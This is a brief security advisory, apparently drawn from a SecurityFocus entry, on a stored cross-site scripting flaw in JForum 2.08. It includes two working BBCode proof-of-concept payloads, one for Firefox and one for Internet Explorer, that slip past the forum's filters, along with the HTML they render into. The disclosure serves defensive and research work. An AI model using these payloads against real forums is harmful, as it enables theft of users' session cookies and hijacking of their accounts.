source: https://www.securityfocus.com/bid/42414/info

JForum is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

JForum 2.08 is vulnerable; other versions may also be affected. 

Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):

    [color=red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)']XSS4FF[/color] 


Renders into the following HTML code:

    <font color='red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)'>XSS4FF</font> 



Stored XSS - proof of concept for Internet Explorer ("style" cannot contain parenthesis "(" ):

    [color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color] 



Renders into the following HTML code:

    <font color='red' /style='color:expression(alert(document.cookie))'>XSS4IE</font>